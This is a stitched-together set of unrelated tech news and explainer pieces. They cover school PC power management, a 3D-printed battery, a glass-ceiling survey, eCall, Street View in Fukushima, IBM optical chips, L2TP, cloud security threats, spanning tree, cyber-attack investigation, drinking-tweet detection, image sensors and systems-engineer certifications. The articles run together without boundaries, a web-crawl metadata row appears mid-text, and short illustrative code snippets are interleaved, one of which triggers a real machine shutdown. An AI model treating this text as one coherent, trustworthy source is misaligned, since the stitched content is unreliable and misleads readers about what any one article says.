Carroll said policies were set up so different computers can shut down at different times. An administrative computer might turn off at a different time than a computer in the school library.
Mike Jager, Verismic’s global consulting services manager, said the software monitors a PC’s policy for its prearranged shutdown time. For example, if a computer is scheduled to power down after 15 minutes of inactivity at 7 p.m., the software ensures that it will power down even if the computer’s operating system fails to do it.
Jager said “OS insomnia” — caused when a computer’s operating system doesn’t shut down the computer at a scheduled time — is fairly common. The power management software can act as a second line of defense.
“If the PC does not go down at 7 p.m., our agent will kick in and say, ‘You’re delinquent; you have missed that shutdown setting at 7 p.m., and you have been inactive. Therefore, we’re going to shut you down now.’ And we initiate the shutdown,” Jager said.
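That second line of defense can be sketched in a few lines. The snippet below is illustrative only: the 7 p.m. schedule and 15-minute idle threshold are the example values from this article, while how the real agent measures idle time and schedules itself is not described here, so those parts are assumptions:

```python
import subprocess
from datetime import datetime, time

POLICY_SHUTDOWN = time(19, 0)   # scheduled shutdown: 7 p.m.
IDLE_THRESHOLD_MIN = 15         # inactivity required before forcing shutdown

def enforce_policy(idle_minutes: float, now: datetime) -> bool:
    """Force a shutdown if the PC missed its scheduled power-down."""
    past_schedule = now.time() >= POLICY_SHUTDOWN
    if past_schedule and idle_minutes >= IDLE_THRESHOLD_MIN:
        # Windows-style command; a Linux agent might call "shutdown -h now".
        subprocess.run(["shutdown", "/s", "/t", "60"], check=False)
        return True
    return False

enforce_policy(idle_minutes=42, now=datetime.now())
```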
Regularly scheduled power-downs are projected to not only reduce costs, but also to reduce the school district’s carbon footprint. According to the school district, PC power management is estimated to save $300,000 and reduce 3,670 tons of carbon dioxide a year.
Tiny 3D printed battery could power devices of the future
- By Kevin McCaney
- Jun 21, 2013
A team of university researchers has taken 3D printing to the nanoscale, printing a lithium ion battery the size of a grain of sand and opening up new possibilities for tiny medical, communications and other devices.
Based at Harvard University and the University of Illinois at Urbana-Champaign, the researchers were able to print interlocked stacks of hair-thin “inks” with the chemical and electrical properties needed for the batteries, according to a report by the Harvard School of Engineering and Applied Sciences.
It’s a breakthrough in the development of microbatteries, which to date have used thin films of solid materials that lacked the juice to power devices such as miniaturized medical implants, insect-sized robots and minuscule cameras, the researchers said. Small, 3D-printed batteries also could help propel development of wearable technology, decreasing the weight of products like Google Glass or smartphone wristwatches.
The research team tackled the power problem by using a custom 3D printer to produce precise, tight stacks of ultrathin battery electrodes. The key was developing the printable electrochemical inks — one for the anode and one for the cathode, each made with nanoparticles of lithium ion metal oxide compounds, the researchers said.
After printing, they put the stacks into a container, added an electrolyte solution, then measured the power of the finished product. “The electrochemical performance is comparable to commercial batteries in terms of charge and discharge rate, cycle life and energy densities,” said Shen Dillon, a collaborator on the project led by Jennifer Lewis. “We’re just able to achieve this on a much smaller scale.”
Lewis, currently a professor at Harvard, led the project while at the University of Illinois at Urbana-Champaign, in collaboration with Dillon. They have published their results in the journal Advanced Materials.

3D printing (or additive manufacturing), once used mainly for prototyping circuit boards and other electronics, has exploded in the last few years, being used for everything from aircraft to flexible displays and, famously, guns. The Army 3D prints gear for troops on the spot in Afghanistan. NASA wants to 3D print food on long space missions. And the Obama administration has touted it as the future of manufacturing.
Its possibilities are only likely to grow. Prices for 3D printers are coming down, making them available to innovators with any kind of budget. One engineer at the Massachusetts Institute of Technology is even pushing into 4D, researching how to print objects that change over time.
While many 3D printing projects are going big — even to the point of planning to print an entire house — taking it to the nanoscale could have an even bigger impact. With the Harvard/UI team’s tiny batteries on board, the possibilities for microscopic implants, sensors, cameras, wearable computers and other gear just grew.
Kevin McCaney is a former editor of Defense Systems and GCN.
Yet Despite Belief in Existence of “Glass Ceiling,” Women Report Being as Personally Satisfied as Men in Their Professional Careers
NEW YORK; March 8, 2006 – Despite significant gains in the past 10 years, women executives around the world still face an uphill battle in workplace equality, a new study by Accenture shows.
The study, entitled “The Anatomy of the Glass Ceiling: Barriers to Women’s Professional Advancement,” is based on a survey of 1,200 male and female executives in eight countries in North America, Europe and Asia: the United States, Canada, Austria, Germany, Switzerland, United Kingdom, Australia and the Philippines.
Respondents were asked to score factors they felt influenced their career success across three “dimensions”: individual (career planning, professional competence, assertiveness, etc.); company (supportive supervisors, transparent promotion processes, tailored training programs, etc.); and society (equal rights, government support of parental leave, etc.)
The differences between male and female respondents’ answers were used to calculate the current “thickness” of the glass ceiling — a term coined in the 1980s to describe an unacknowledged barrier that prevents women and other minorities from achieving positions of power or responsibility in their professions.
According to the study, only 30 percent of women executives and 43 percent of male executives believe that women have the same opportunities as men do in the workplace today — supporting the existence of a glass ceiling.
However, the study also found that overall the women executives were about as personally satisfied with their own career opportunities and positions as men were with theirs. For instance, the same percentage of men and women respondents (58 percent) said they are fairly compensated or that their salary reflects their personal achievements. In addition, about the same number of women as men (66 percent vs. 70 percent, respectively) said they feel secure in their jobs.
For some women executives the glass ceiling is believed to be more of a societal obstacle than an individual barrier. Women executives in the United States and the United Kingdom, for instance, are very confident of their own business capabilities (the “individual” dimension) and are more likely to believe that the greatest barriers to their success come not from their own capabilities or even from their own companies’ cultures (the “company” dimension), but from society at large (the “society” dimension). On the other end of the spectrum, women executives in Canada and the Philippines believe that societal issues are less of a barrier to achieving career success and that corporate cultures are more to blame for the glass ceiling.
The company dimension appears to pose the greatest barrier to advancement in Austria, whereas Swiss respondents believe the company dimension poses relatively few barriers to their advancement. In Germany and Australia, barriers to advancement are most prevalent in the dimension of society.
“The study reminds us that while there has been progress in shattering the glass ceiling over the past 20 years, organizations – and societies – need to realize how important it is to capitalize and build upon the skills of women,” said Kedrick D. Adkins, Accenture’s chief diversity officer. “Creating a business culture that supports innovation, growth and prosperity requires people with diverse talents, and organizations need to ensure that they value all styles of leadership and work. In other words, global inclusion is the key to the long-term success of companies.”
The study was conducted as part of Accenture’s observance of International Women’s Day today, which the company is marking through a series of coordinated activities in 20 cities throughout the world focused on women in business. Accenture expects more than 3,000 of its people to join clients, business leaders and academics in such activities as leadership development sessions, career workshops and networking events.
Accenture conducted online surveys of approximately 1,200 senior executives at mid- to large-sized companies ($250 million+) in eight countries: Australia, Austria, Canada, Germany, the Philippines, Switzerland, the United Kingdom and the United States. Approximately half of all respondents were female. Fieldwork was conducted between January and February 2006.
Accenture is a global management consulting, technology services and outsourcing company. Committed to delivering innovation, Accenture collaborates with its clients to help them become high-performance businesses and governments. With deep industry and business process expertise, broad global resources and a proven track record, Accenture can mobilize the right people, skills and technologies to help clients improve their performance. With more than 126,000 people in 48 countries, the company generated net revenues of US$15.55 billion for the fiscal year ended Aug. 31, 2005. Its home page is www.accenture.com.
In European plan, cars in a crash would auto-dial for help
Europe appears to be out in front of the United States when it comes to using IT to improve transportation and health care costs across state jurisdictions.
The European Parliament (EP) adopted a resolution this week urging adoption of a law that would require all new cars to be equipped with technology to automatically contact rescue services in the event of a crash, Computerworld reported.
The eCall system is estimated to be able to speed up the response times of emergency services by 40 per cent in urban areas and by as much as 50 per cent in rural locations, according to the Touchstone Research Lab.
That would result in an estimated 2,500 lives saved a year and reduce injuries by 10 percent to 15 percent, the research firm said.
The eCall device would automatically dial the European emergency services number, 112, in the event of a serious accident, then send data wirelessly from airbag and impact sensors as well as GPS coordinates to local emergency agencies.
The European Commission is aiming to have a fully functional eCall system in place throughout the European Union by 2015, according to telecompaper.com.
A small Japanese town, abandoned because of radiation concerns after the Fukushima nuclear plant disaster in 2011, is working with Google's map service to keep its memory alive.
Google said it will map the streets of Namie, in Fukushima Prefecture in northeast Japan, using Street View. The town is about 20 kilometers from the nuclear power plant that suffered meltdowns and released radioactive materials after a powerful earthquake and tsunami struck the region two years ago.
The Internet company said in a blog posting that the mapping will take several weeks, and the company aims to post the data online in a few months' time.
"All of the residents of our town, 21,000 people, are currently evacuated all over Japan. Everyone wants to know the state of the disaster area, there are a lot of people that need to see how things are," said Tamotsu Baba, town mayor.
"I think there are many people all over the world that want to see images of the tragic conditions of the nuclear accident."
Baba said the town is happy to cooperate with Google in the filming project.
Namie was split between two evacuation zones established by the Japanese government after the Fukushima disaster. It is partly in the "security zone" where access is limited and partly in the "planned evacuation zone," where residents were told to leave within a month's time.
Google said its staff is following recommended national and local guidelines for safety during filming. The company posted about the project on its Japanese blog, including a short video.
"We hope that this project will also help protect against the fading of memories of the disaster, as we approach the two-year mark from when it occurred," wrote project manager Keiichi Kawai. | <urn:uuid:8d535917-61ee-424c-a1bb-c45309c385bf> | CC-MAIN-2017-09 | http://www.networkworld.com/article/2164111/lan-wan/google-street-view-to-map-abandoned-fukushima-town.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170249.75/warc/CC-MAIN-20170219104610-00072-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.977078 | 347 | 2.859375 | 3 |
IBM has announced a prototype optical transceiver chipset that can transmit data over optical fiber at speeds of up to 160Gbps. IBM informs us that it's fast enough to transmit "a typical high-definition movie" per second. (Will "typical high-definition movie" replace "Library of Congress" as the SI-approved unit for "a whole lot of data"? Only time will tell.) 160Gbps is over ten times the 13.271 Gbps speed of backbone-class OC-256 fiber.
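As a rough sanity check on those headline numbers (illustrative arithmetic only; the 20 GB movie size is a ballpark assumption, not an IBM figure):

```python
rate_gbps = 160
gigabytes_per_second = rate_gbps / 8     # 20 GB of data every second
oc256_gbps = 13.271
print(gigabytes_per_second)              # 20.0
print(rate_gbps / oc256_gbps)            # ~12.1, i.e. "over ten times" OC-256
print(gigabytes_per_second / 20)         # ~1 movie per second for a ~20 GB HD film
```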
The main transceiver chip is implemented in a regular CMOS process, and it comes out to about 17 mm² and consumes only 2.5 watts of power. The chip is then packaged together with some other components made of indium phosphide and gallium arsenide to make the complete transceiver device.
IBM's optical announcement sounds very similar to an optical-related announcement from Intel in September of last year. Intel also talked up a hybrid CMOS-based optical transceiver device, with part of the device built in indium phosphide and packaged together with a more conventional CMOS chip containing other components.
The idea behind both of these products is that they point the way toward an eventual replacement of the regular copper-based bus-level interconnect for desktops with much faster, lower-power optical technologies. Currently, the cost and size of the lasers used in optical transmission make fiber optics infeasible for the kinds of short distances that one finds inside a server rack, or within a single server box.
When we see the first commercial hybrid CMOS optical devices from Intel and IBM, they'll probably be used for high-speed networking in the datacenter. In particular, the market for high-performance clusters would love a low-power, low-cost networking technology with such high transfer rates. From there, the technology will migrate onto the motherboard and provide an eventual foundation for future frontside buses and the like.
I recently spoke with Intel about their 80-core Terascale research prototype (more on that when the article goes up this week), and it was clear from that talk that Intel will be making some interconnect-related announcements in the coming year. Furthermore, all signs point to those announcements centering around the same kind of optics technologies that the company has talked up previously and that IBM is touting today.
L2TP Attributes Summary
The proposed L2TP standard was published in 1999 as RFC 2661. L2TP (Layer 2 Tunneling Protocol) is an IETF (Internet Engineering Task Force) standard that combines the traits of two existing tunneling protocols: Cisco’s L2F (Layer 2 Forwarding) and Microsoft’s PPTP (Point-to-Point Tunneling Protocol). L2TP is in effect an extension of PPP (Point-to-Point Protocol), a significant constituent of VPNs.
VPNs (virtual private networks) let users connect to corporate intranets and extranets. VPNs provide cost-effective networking, but long-established dial-up networks support only registered IP (Internet Protocol) addresses, which limits the types of applications that can run over a VPN. The main reasons to use L2TP are its support for multiple protocols and for unregistered, privately routed IP addresses.
L2TP may be used as part of an ISP's (internet service provider's) service delivery. On its own, however, it provides no encryption or privacy features, which is why it usually depends on a separate protocol, such as IPsec, to supply encryption.
L2TPv3, the latest version of the protocol, was introduced in RFC 3931 (2005). This version added security features, enhanced encapsulation, and the ability to carry Layer 2 data links other than PPP.
Packet’s structure for L2TP
An L2TP packet is made up of the following fields: a Flags and Version field (bits 0-15); an optional Length field (bits 16-31); a Tunnel ID field (bits 0-15); a Session ID field (bits 16-31); optional Ns (bits 0-15) and Nr (bits 16-31) fields; optional Offset Size (bits 0-15) and Offset Pad (bits 16-31) fields; and a payload data field of variable length.
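A compact way to see how those fields fit together is to parse them. The sketch below follows the RFC 2661 layout, in which the flag bits determine which optional fields are present; it is illustrative only and skips validation of reserved bits and buffer lengths:

```python
import struct

def parse_l2tp_header(packet: bytes) -> dict:
    """Parse the fixed and optional fields of an L2TPv2 (RFC 2661) header."""
    (flags_ver,) = struct.unpack_from("!H", packet, 0)
    hdr = {
        "is_control": bool(flags_ver & 0x8000),    # T bit: control vs. data
        "has_length": bool(flags_ver & 0x4000),    # L bit
        "has_sequence": bool(flags_ver & 0x0800),  # S bit (Ns/Nr present)
        "has_offset": bool(flags_ver & 0x0200),    # O bit
        "version": flags_ver & 0x000F,             # 2 for L2TPv2
    }
    pos = 2
    if hdr["has_length"]:
        (hdr["length"],) = struct.unpack_from("!H", packet, pos)
        pos += 2
    hdr["tunnel_id"], hdr["session_id"] = struct.unpack_from("!HH", packet, pos)
    pos += 4
    if hdr["has_sequence"]:
        hdr["ns"], hdr["nr"] = struct.unpack_from("!HH", packet, pos)
        pos += 4
    if hdr["has_offset"]:
        (offset_size,) = struct.unpack_from("!H", packet, pos)
        pos += 2 + offset_size                     # skip the offset pad
    hdr["payload"] = packet[pos:]
    return hdr
```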
Packet’s exchange in case of L2TP
When an L2TP connection is set up, a number of control packets are exchanged between the server side and the client side to create a tunnel and a session for each direction. Using these control packets, one peer asks the other to assign a particular tunnel ID and session ID; data packets carrying the PPP frames are then exchanged using that tunnel ID and session ID.
In addition, a sequence of L2TP control messages is exchanged between the LAC (L2TP Access Concentrator) and the LNS (L2TP Network Server) to perform a handshake before the tunnel and session are established.
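For reference, the tunnel- and session-establishment exchanges defined in RFC 2661 can be written down as ordered lists of messages; the incoming-call case is shown, and the comments spell out the RFC's message names:

```python
TUNNEL_HANDSHAKE = [
    ("LAC", "SCCRQ"),  # Start-Control-Connection-Request
    ("LNS", "SCCRP"),  # Start-Control-Connection-Reply
    ("LAC", "SCCCN"),  # Start-Control-Connection-Connected
]
SESSION_HANDSHAKE = [
    ("LAC", "ICRQ"),   # Incoming-Call-Request
    ("LNS", "ICRP"),   # Incoming-Call-Reply
    ("LAC", "ICCN"),   # Incoming-Call-Connected
]
```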
L2TP tunnel models
An L2TP tunnel may extend across an entire PPP session or across only one segment of a two-segment session. Different tunneling models represent these situations: the voluntary tunnel model, the compulsory tunnel model for incoming calls, the compulsory tunnel model for remote dial-up connections, and L2TP multi-hop connections.
- Support for multi-hop connections
- Operation as a client-initiated Virtual Private Network (VPN) solution
- Value-added traits carried over from Cisco’s L2F, such as load sharing and backup support
Cloud security is an evolving sub-domain of information security dedicated to the protection of the data, applications and infrastructure associated with cloud computing. It incorporates a broad set of policies, driven by security procedures, that provide a maximum level of assurance for customers of cloud services.
Concerns with Cloud Security
Cloud computing is providing new horizons for maintaining organizational assets. But with the ease and convenience also comes the challenge of securing enterprise data. The biggest reason for security concerns is the involvement of third parties, i.e. cloud service providers, who can access data stored at remote locations.
Being a form of distributed computing, cloud computing is still waiting for proper standardization. When migrating to cloud services, there are a number of factors an organization must consider. Organizations need to understand the key benefits along with the risks of adopting a particular solution or service provider. In an evolving security and technological arena, the assessment of risks and benefits keeps changing with the advancements brought by new technologies.
Cloud security is a shared responsibility between the cloud service provider (CSP) and its clients. It is important to note that not all cloud service providers offer the same security measures and other operational and managerial functions. These should be clearly discussed, defined and agreed upon between service providers and customers.
More and more organizations are migrating to the cloud and enjoying the benefits offered by various service providers. Enterprises are embracing the economic and operational advantages of the cloud to extend their business to larger scales. But cloud providers like AWS need to meet key security requirements for organizations to be able to trust them with their most confidential data. As malicious attackers become more sophisticated, they are finding new ways to target the applications and data of enterprises. These attacks are encouraged by the fact that the cloud has some architectural flaws, inherited from its parent applications, that can be exploited for an attacker's gain. Enterprises are shifting their resources to the cloud at an unprecedented rate, and there are many security threats to which cloud data is vulnerable.
Some of them are listed below.
- Data Breaches: One of the most dangerous shortcomings of having data in the cloud is the possibility of compromised data.
- Data Loss: Data in the cloud is physically stored on third-party servers and accessed virtually by customers. There is therefore a real possibility that data on the remote servers can be lost through damage or server hacking.
- Account Hijacking: Access to data is given to clients through user accounts, so all of the data on a cloud hosting service can be reached only through these accounts. If any such account is compromised or hijacked by a hacker, all of the important data is at risk of being compromised. There is also the possibility of privilege escalation attacks, which exploit user-level access rights.
- Insecure APIs: Cloud data is called and managed through application programming interfaces (APIs). API calls can be spoofed or hijacked to transmit infected data.
- Denial of Service: The cloud is basically an interface between a user and an application server. If the cloud server is vulnerable or not properly protected, it can be the target of denial-of-service attacks, in which legitimate users are deprived of services, such as data access, from the server.
- Malicious Insiders: Sharing data with a third party requires a fair amount of trust. Organizations may be secure against certain attacks from outside the company, but they also need to be aware of attacks from within the organization.
- Abusing Cloud Services: Legitimate cloud services can be abused by malicious actors for monetary or other gains.
- Shared Technology Issues: Many security issues emerge from the shared-resource technology the cloud is built on. If hackers breach one cloud, all data within that cloud can be compromised.
- Insufficient Due Diligence: Paying too little attention to due diligence can also pose a substantial threat to data in the cloud.
Cloud computing is transforming the way businesses and governments manage their data at an unimaginable rate. Cloud services continue to evolve in terms of service models, creating new security challenges for security researchers along the way. The shift from server-based to service-based thinking is changing the terms in which technology departments operate, and the design of architectures is in turn shaped by the underlying computing technology and applications. But these advances have created substantial new security vulnerabilities, including critical security issues whose impact is still emerging with each passing day.
By Chetan Soni
Now that the network is installed, each switch has a bridge ID number, and the root switch has been elected, the next step is for each switch to perform a calculation to determine the best link to the root switch. Each switch will do this by comparing the path cost for each link based on the speed.
For paths that go through one or more other switches, the link costs are added. The switch compares this aggregate value to the other link costs to determine the best path to the root switch.
For example, switch 2 has multiple connections back to the root switch. It selects the 1000 Mbps connection on the trunk (port 1) over the 100 Mbps connection on port 9 because the path cost (see below) for the link is lower. Port 1 is now a forwarding port and port 9 is a blocking port; however, port 9 still receives BPDUs from the root switch.
|Link Speed|10 Mbps|100 Mbps|1 Gbps|10 Gbps|
|STP Path Cost|100|19|4|2|
All ports on the root switch are forwarding ports. Each of the other switches in this network has one forwarding port to the root and one or more blocking ports eliminating the loop in the network.
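The port-selection rule itself is easy to sketch. The cost table below uses the standard IEEE 802.1D values shown above; the port names, the candidate paths and the helper function are illustrative assumptions rather than anything a real switch exposes:

```python
# Standard 802.1D path costs, keyed by link speed in Mbps.
PATH_COST = {10: 100, 100: 19, 1000: 4, 10000: 2}

def best_path_to_root(candidate_paths: dict) -> tuple:
    """Pick the root port by lowest cumulative path cost.

    candidate_paths maps a local port name to the list of link speeds
    (in Mbps) traversed on the way to the root; per-link costs are added
    and the port with the lowest total wins.
    """
    totals = {
        port: sum(PATH_COST[speed] for speed in speeds)
        for port, speeds in candidate_paths.items()
    }
    root_port = min(totals, key=totals.get)
    return root_port, totals

# Switch 2 from the earlier example: a 1000 Mbps trunk on port 1 versus a
# 100 Mbps link on port 9, both leading directly to the root switch.
print(best_path_to_root({"port1": [1000], "port9": [100]}))
# ('port1', {'port1': 4, 'port9': 19})
```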
While the network is functioning, the root and the other switches communicate with each other via BPDUs and maintain timers to monitor the links and make adjustments if necessary.
Here are the common STA timers:
- Hello time: The interval at which the root switch sends out BPDUs. The default setting is two seconds. This is a type of keep-alive message that is a short message indicating that everything is okay and that the root switch is functioning correctly.
- Maximum age time: The time a switch stores a BPDU. The default setting for this is twenty seconds. If the root fails and does not send out its BPDUs, after twenty seconds the switches recognize the problem and enter a listening and learning state to collect information about the network via BPDUs from other switches. If necessary, a new root switch is elected and new links chosen for connecting to the root switch.
- Forward delay time: The duration of the listening and learning states while the network is analyzed by STA. The default setting is fifteen seconds. Normally, a port is either forwarding or blocking, but during the initial implementation or during any other topology changes, a port temporarily enters a listening and learning state to determine who is the root and the best paths back to the root from its perspective.
For example, the root switch goes down and fails to send its BPDUs every two seconds. After twenty seconds, each switch examines its maximum age time and declares that the root switch is down. Each switch enters a fifteen second listening and fifteen second learning state to determine the bridge ID of the new root switch and the path selection to the root switch. It takes a total of fifty seconds to go through this process before network connectivity is fully restored.
When a topology change occurs, the STA identifies the problem and takes corrective action.
As an example, Switch 1 is the root and has two connections to switch 4. Port 1 on the switch is a 100BaseFX connection and port 4 is a 10BaseFL connection. Switch 4 uses port 1 for forwarding and port 4 for blocking.
Suppose an accident occurs. The fiber optic riser cable containing the 100BaseFX connection on port 1 of Switch 4 is cut, so the link is down. After twenty seconds, Switch 4 has not seen any BPDUs on port 1, but continues to receive the BPDUs on port 4. Switch 4 will now change the port status of port 1 to blocking and port 4 to forwarding to provide connectivity from Switch 4 to the root.
If the original 100BaseFX connection is repaired, Switch 4 recognizes the repair when it begins getting the BPDUs on port 1 again. Switch 4 reverts back to the 100 Mbps connection over the 10 Mbps connection because of the path cost comparison.
Your network traffic may require multiple links between switches to handle heavier loads or to protect important links. Normally, when multiple links exist between switches, the Spanning Tree Algorithm disables the redundant links to eliminate a loop in the network.
IEEE’s 802.1AX specification defines LACP (Link Aggregation Control Protocol), which offers a way to combine several physical ports into a single logical channel. LACP lets a network switch negotiate automatic link bundling. To do this, a switch sends LACP packets to another directly connected switch that also runs LACP.
LACP sends LACPDUs (LACP Data Units) on all links on which a manager has configured the protocol. If it finds that the switch on the other end has also been configured for LACP, that switch will independently send frames on the same links. This lets the two switches detect the multiple links between them so they can combine them into a single logical channel.
A manager may configure LACP in active or passive mode. In active mode, it always sends frames on the configured links. In passive mode, it waits to hear LACPDUs before acting. This prevents accidental loops as long as the other device is in active mode.
Having a military background, I tend to look at all security issues with the perspective of someone who’s served in the armed forces. That means using a thorough investigation process that doesn’t treat any action as accidental or an attack as a stand-alone incident and looking for links between seemingly unconnected events.
This method is used by law enforcement agencies to investigate acts of terrorism, which, sadly, are happening more frequently. While terror attacks that have occurred in the physical world are making headlines, the virtual world is also under attack by sophisticated hackers. However, not much is said about the similarities between investigating both types of attacks or what security researchers can learn from their law enforcement counterparts. I’ve had this thought for awhile and, fearing that I’d be seen as insensitive to recent events, debated whether to write this blog. After much thought, I decided that the stakes are too high to remain silent and continue treating each breach as a one-off event without greater security implications.
The parallels between cyber and terror attacks are numerous: they involve well-coordinated adversaries who have specific goals and planned intricate campaigns months in advance. The target’s security measures are irrelevant and can always be exploited. Preventing cyber and terror attacks is difficult, given the numerous vectors an adversary can use. Discovering one component of either type of attack can lead to clues that reveal an even larger, more detailed operation. But the methods used to investigate cyber attacks often fall short at establishing links between different events and possibly preventing hackers from striking again.
Cyber attacks targeting infrastructure are happening
To date, we haven’t experienced a cyber attack that has caused the same devastation of what’s happened in the physical world. Having your credit card number stolen doesn’t compare to lives being lost. But this doesn’t mean we won’t see cyber attacks that cause major disruptions by targeting critical infrastructure.
In fact, they’re already happening. Just last week the U.S. Department of Justice accused seven Iranians of hacking the computer control system of a dam in New York and coordinating DDoS attacks against the websites of major U.S. banks. According to the DOJ, the hackers would have been able to control the flow of water through the system had a gate on the dam not been disconnected for repairs. Then in December, hackers used malware to take over the control systems of two Ukraine energy plants and cut power to 700,000 people. I’m not trying to spread fear of a cyber apocalypse by mentioning these incidents. Fear mongering isn’t applicable if the events have occurred.
When examining terror attacks, police conduct forensic investigations on evidence found at the scene. If suspects are arrested, the police confiscate their smartphones (as we’ve seen with the iPhone used by the shooter in the San Bernardino, Calif., attack) and computers and review information like call logs and browsing histories. These procedures may provide investigators with new information that could lead to other terror plots being exposed, the arrest of additional suspects and intelligence on larger terrorist networks.
Applying an IT perspective to breaches won’t reveal complete cyber attacks
Cyber attacks, on the other hand, are investigated in a manner that isn’t as effective. They’re handled as individual incidents instead of being viewed as pieces of a larger operation. I’ve found that too many security professionals are overly eager to remediate an issue. Considering the greater security picture isn’t factored into the process, nor is it culturally acceptable within most organizations to do so. Corporate security teams have been conditioned to resolve security incidents as quickly as possible, re-image the infected machine and move on to the next incident.
Cyber attacks, though, are multi-faceted and the part that’s the most obvious to detect sometimes serves as a decoy. Adversaries know security teams are trained to quickly shut down a threat so they include a component that’s easy to discover. While this allows a security professional to report that a threat has been eliminated, this sense of security is false. Shutting down one known threat means exactly that: you’re acting on a threat that was discovered. But campaigns contain other threats that are difficult to discover, allowing the attack to continue without the company’s knowledge.
Unfortunately, most companies don’t approach cyber security with either a military or law enforcement perspective. They use IT-based methods and try to block every threat and prevent every attack, approaches that are unrealistic and ineffective given the sophisticated adversaries they’re facing. The clues security teams need to discover, eliminate and mitigate the damage from advanced threats is contained in the incidents they have been resolving.
Cyber security stands to learn a lot from law enforcement when it comes to investigating attacks. Next time they’re looking into a breach, security professionals should:
- Not treat a security incident as an individual event. Try to place it in the greater context of what else is occurring in your IT environment. View the attack as a clue that, if followed, can reveal a much larger, more complex operation.
- Instead of immediately remediating an incident, consider letting the attack execute to gather more intelligence about the campaign and the adversary.
- Remember the threat that’s the most obvious to detect is often used as a decoy to shield a more intricate operation.
While there will always be terrorists and hackers, remembering these points helps us stay ahead of them, minimize the impact of their attacks and regain a sense of control.
Tweeting under the influence may not get you in as much trouble as drunk driving does, but it can still mean a whole lot of hot water. Now there's an algorithm that can tell when you're drinking while tweeting -- and also figure out where you're imbibing.
Using machine learning, researchers at the University of Rochester have created a system that can find alcohol-related tweets and determine whether they were made by someone who was actually drinking at the time. It can also pick out whether those tweeters were drinking at home or somewhere else.
Equipped with that knowledge, the researchers compared the results for different locations in New York State. Eventually, they hope to use the technology to study the health implications of alcohol.
So, how did they do it?
The researchers began by collecting geotagged tweets sent over 12 months up to July 2014 from New York City and nearby suburban and rural areas. Then they zeroed in on those that included alcohol-related words, such as "drunk" or "beer," and put the Mechanical Turk crowds to work to help confirm the context.
Specifically, Mechanical Turk workers read the tweets to confirm not only that the tweeter was talking about using alcohol personally, but also that he or she was consuming it while tweeting.
To figure out the settings from which the tweeters sent their tweets, the researchers focused on words and phrases that people tend to use in tweets sent from their homes, such as "bath" or "sofa," and confirmed the geolocated results once again via Mechanical Turk.
They used all that information to train a machine-learning algorithm, which they hope to use to better understand alcohol consumption patterns and how they vary with location and other factors. That data could help them do things like relate the number of places to buy alcohol in a region to the amount of home drinking that takes place there.
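For a sense of what such a pipeline can look like, here is a minimal sketch using scikit-learn. It is not the Rochester team's actual code, and the sample tweets, labels and model choice are made-up assumptions for illustration:

```python
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.linear_model import LogisticRegression
from sklearn.pipeline import make_pipeline

# Hypothetical tweets labeled (e.g., via Mechanical Turk) as
# drinking-while-tweeting (1) or not (0).
tweets = ["out for a beer with friends", "stuck in traffic again",
          "so drunk right now", "watching the game at home"]
labels = [1, 0, 1, 0]

model = make_pipeline(TfidfVectorizer(ngram_range=(1, 2)), LogisticRegression())
model.fit(tweets, labels)
print(model.predict(["grabbing drinks downtown"]))
```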
A paper describing the work will be presented at the International Conference on Web and Social Media in May.
Historically, CCD (charged coupled device) sensors have existed much longer than CMOS sensors, that is to say, for more than 40 years. Due to constant improvement and optimization over the years, CCD sensors today stand for excellent image quality. In 2009, the American scientists Willard Boyle and George E. Smith were awarded the Nobel Prize for Physics for the invention of the CCD sensor. Originally developed in 1969 for the storage of data, the potential of the charge coupled device as a light sensitive apparatus was soon realized. By 1975, the first sensors with a resolution sufficient for television cameras appeared. However, it took more than 10 years before the process technology was mature enough to begin production of CMOS (complementary metal oxide semiconductor) sensors. In the mid-nineties, the first commercially successful CMOS sensors appeared on the market.
CMOS sensors are based on the same physical principles as CCD sensors. They convert incoming photons into electrons by means of a photo effect. As a result of their sensor structure, the maximum sensitivity of CMOS sensors is in the red spectral region (650 – 700 nm). CCD sensors, not least because of the numerous innovations during their longer technological history, have a maximum at about 550 nm - exactly where the human eye is most sensitive.
INCOSE Systems Engineer Certs Offer Broad-Based Skills Validation
The job title of “systems engineer” might not sound all that glamorous at first, but once you consider that these IT pros work on complex systems that can include military aircraft and tanks, the job description suddenly becomes a lot more exciting.
As David Walden, Certified Systems Engineering Professional (CSEP) and INCOSE certification program manager, explained it, a systems engineer is an IT professional who heads up a development project on an intricate, software-intensive system. The system engineer has a broad role, looking at the entire system from conception to final disposal.
Take, for example, a nuclear reactor. Walden said the systems engineer would need to consider: “How do you dispose of that system safely, in a way that is both economical and good for the environment? How do you design the system so that it can be easily disassembled or reused or recycled?
“[Ultimately], a systems engineer looks at the whole problem and interfaces with the customer to determine what the real need is, envision what that system will be and then make sure it’s delivered and meets and exceeds [the] customer’s expectations,” Walden said.
“They translate all of those vague and soft-and-fuzzy stakeholder [requirements] — ‘I want a car that goes fast,’ ‘I want a rocket ship that can be launched 42 times’ — and then they work with the design engineers to make that a technical reality.”
Like many roles in the IT industry, there are organizations dedicated to training and certifying systems engineers. One such organization is the International Council on Systems Engineering (INCOSE). The professional society — created in 1990 — serves more than 6,000 professionals worldwide through its efforts to provide education and development opportunities to the global systems engineering community. INCOSE also establishes professional standards for the field.
Earlier this year, INCOSE upgraded its certification program to a three-tiered model. CSEP is the core certification for the program and validates a foundational level of systems engineering knowledge. This exam — created in 2004 — was upgraded in July in conjunction with the release of a new version of INCOSE’s Systems Engineering Handbook: Version 3.1. This upgrade gives the exam an international perspective, using international standard ISO/IEC 15288.
The CSEP is for professionals with at least a bachelor’s degree in science or a technical subject, along with five years of experience in systems engineering. The degree can also be replaced by additional years of experience.
While upgrading the exam, INCOSE also added a specialization option in Department of Defense acquisition (CSEP Acq). This exam, which must be completed either concurrently or after passing the core CSEP exam, validates knowledge of systems engineering within a U.S. Department of Defense (DOD) acquisition environment. This certification is ideal for both current DOD professionals — to help them climb the career ladder — and industry professionals who work on government contracts and want to highlight their credibility and understanding of the DOD development process.
Also new to INCOSE certifications is the entry-level Associate Systems Engineering Professional (ASEP). The ASEP certification requires passing the same exam as the CSEP and holding a bachelor’s degree, but it does not require an experience component. The ASEP is good for up to 10 years, by which time INCOSE expects the professional to have upgraded to CSEP status.
And for seasoned systems engineers, INCOSE will unveil its Expert Systems Engineering Professional (ESEP) certification in 2009.
“ESEP is targeted for a very limited audience of senior leaders in system engineering,” Walden explained. “And the way that we [will validate] that is not through a knowledge exam, but through a detailed interview process with the applicant and [his or her] references.”
